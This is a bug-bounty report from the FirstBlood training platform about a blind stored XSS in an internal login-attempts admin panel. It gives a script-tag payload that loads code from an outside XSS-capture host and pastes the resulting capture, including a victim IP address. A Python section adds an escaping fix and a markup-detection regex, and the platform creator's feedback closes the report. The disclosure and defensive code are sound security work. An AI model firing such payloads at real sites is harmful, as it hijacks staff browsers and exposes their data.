FirstBlood-#1319: Blind XSS on FirstBloodHackers INTERNAL ADMIN PANEL
This issue was discovered on FirstBlood v3



On 2022-12-09, didsec Level 5 reported:

Hi there

I found that the internal admin page is vulnerable to a blind XSS via login attempts on login.php.

Payload

`"><script src="https://xss.hunter"></script>`

To reproduce:

  1. Go to the login page
  2. Enter payload in the username and password fields
  3. Click login

Impact

An attacker is able to access critical information from the admin panel.

XSS Hunter report below

URL

The URL of the page the payload fired on.

`https://firstblood-helper.com/login_attempts.php?id=683`

---

IP Address

Remote IP address of the victim.

`86.145.182.70`

---

Referer

Referring page for the vulnerable page.

`https://firstblood-helper.com/login_attempts.php`

---

User-Agent

Web browser of the victim.

`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`

---

Cookies

Non-HTTPOnly cookies of the victim.

_None_

---

Title

Vulnerable page's title.

`FirstBloodHackers INTERNAL ADMIN PANEL`

---

DOM/HTML

Rendered DOM of the vulnerable page.

_Page HTML too large to display inline._

---

Text

Text of the vulnerable page.

```text
Logged in as
ADMINISTRATOR-SEAN
Home
Login Attempts
INTERNAL USE ONLY
Managing FirstBlood Login Attempts
The login attempt below was flagged as being potentially malicious.
ID  Username  Date  Actions
683 ">
```

---

Origin

HTTP origin of the vulnerable page.

`https://firstblood-helper.com`

---

Browser Time

Reported time according to the victim's browser.

`Friday, December 9th 2022, 10:38:55 am (_1670582335223_)`

---

Other

Other miscellaneous information.

Fired in iFrame?: `false`

Vulnerability enumerated `Friday, December 9th 2022, 10:38:57 am`

Report ID: `11b4d0bb-58d4-4a76-be70-8431fe4be1e0`

P1 CRITICAL


FirstBlood ID: 72
Vulnerability Type: Stored XSS

Login attempts were logged on an internal panel on firstblood-helper.com, and the logged username is vulnerable to blind XSS affecting FirstBlood staff.
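The root cause the description above points to is the attempted username being written into the login_attempts.php table without output encoding. The following is an added example, not FirstBlood's code: the table layout, column names and the `is_suspicious` rule are assumptions. It renders one logged attempt the unsafe way beside the escaped way, and flags attempts that carry markup so an analyst sees them before opening the panel in a browser.

```python
import html
import re
from dataclasses import dataclass

# Constructed sample matching the report: attempt id 683 with the reported payload as the username.
PAYLOAD = '"><script src="https://xss.hunter"></script>'


@dataclass
class LoginAttempt:
    id: int
    username: str
    date: str


SAMPLE_ATTEMPT = LoginAttempt(683, PAYLOAD, "2022-12-09")  # constructed sample row


def render_row_unsafe(attempt: LoginAttempt) -> str:
    """The pattern behind the bug: attacker-controlled username concatenated straight into HTML.
    The leading '">' closes the attribute and the <script> tag becomes live markup for staff."""
    return (f'<tr><td>{attempt.id}</td>'
            f'<td data-user="{attempt.username}">{attempt.username}</td>'
            f'<td>{attempt.date}</td></tr>')


def render_row_safe(attempt: LoginAttempt) -> str:
    """The fix: HTML-encode every untrusted value at output time.
    quote=True also encodes quotes, so the value is safe inside an attribute as well."""
    user = html.escape(attempt.username, quote=True)
    return (f'<tr><td>{attempt.id}</td>'
            f'<td data-user="{user}">{user}</td>'
            f'<td>{html.escape(attempt.date, quote=True)}</td></tr>')


# Assumed triage rule: characters or tokens that only make sense as markup in a username.
_MARKUP = re.compile(r'[<>"\']|javascript:|on\w+\s*=', re.IGNORECASE)


def is_suspicious(username: str) -> bool:
    """Detection aid for the 'flagged as potentially malicious' view: True when the stored
    username looks like markup, so it can be reviewed from a text-only tool first."""
    return bool(_MARKUP.search(username))
```

Escaping at output does not change what is stored, so the flagged attempt still appears in the table, just as inert text.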

Report Feedback

@zseano

Creator & Administrator


CONGRATULATIONS, you were the first user to discover this bug based on login IDs. (although you were NOT the first to report it, I have concerns that some users modified earlier reports). You have won yourself a LIMITED edition BugBountyHunter HAT and a bounty. WELL DONE!!!